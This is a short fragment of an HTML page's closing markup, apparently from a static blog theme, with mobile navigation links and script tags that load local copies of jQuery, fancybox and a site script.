  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>